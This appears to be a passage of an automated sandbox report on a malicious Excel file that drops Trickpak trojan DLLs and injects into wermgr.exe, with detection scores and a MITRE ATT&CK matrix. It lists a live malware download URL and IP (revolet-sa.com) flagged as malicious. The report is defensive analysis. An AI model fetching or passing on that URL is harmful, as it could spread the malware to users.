Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_051D0E20 push dword ptr [edx+14h]; ret

1_2_051D0F2D

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\sdbybsd.fds			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\sdbybsd.fds

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\sdbybsd.fds			Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\sdbybsd.fds

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_04DC1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

1_2_04DC1030

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_04D8095E mov eax, dword ptr fs:[00000030h]	1_2_04D8095E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_04D80456 mov eax, dword ptr fs:[00000030h]	1_2_04D80456
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_04DC1030 mov eax, dword ptr fs:[00000030h]	1_2_04DC1030

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_04DC1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

1_2_04DC1030

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Path Interception	Process Injection11	Masquerading121	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution33	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	System Information Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1A8C92C-1A8C92C.xls	22%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx	5%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx	2%	ReversingLabs	Win32.Trojan.Trickpak
C:\Users\user\sdbybsd.fds	5%	Metadefender		Browse
C:\Users\user\sdbybsd.fds	2%	ReversingLabs	Win32.Trojan.Trickpak

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.rundll32.exe.5160000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
revolet-sa.com	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
http://revolet-sa.com/files/countryyelow.php	13%	Virustotal		Browse
http://revolet-sa.com/files/countryyelow.php	100%	Avira URL Cloud	malware
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://ovisualuiapp.azurewebsites.net/pbiagave/	0%	Avira URL Cloud	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
revolet-sa.com	192.232.249.186	true	false	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://revolet-sa.com/files/countryyelow.php	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://login.microsoftonline.com/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://shell.suite.office.com:1443	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://autodiscover-s.outlook.com/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://cdn.entity.	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://powerlift.acompli.net	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://cortana.ai	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://api.aadrm.com/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://api.microsoftstream.com/api/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://cr.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://ecs.office.com/config/v2/Office	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://graph.ppe.windows.net	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://officeci.azurewebsites.net/api/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://store.office.cn/addinstemplate	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://globaldisco.crm.dynamics.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://store.officeppe.com/addinstemplate	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://web.microsoftstream.com/video/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://graph.windows.net	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://dataservice.o365filtering.com/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://ncus.contentsync.	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
http://weather.service.msn.com/data.aspx	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://apis.live.net/v5.0/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://management.azure.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://wus2.contentsync.	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://api.office.net	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://incidents.diagnosticssdf.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://entitlement.diagnostics.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://outlook.office.com/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://templatelogging.office.com/client/log	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://outlook.office365.com/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
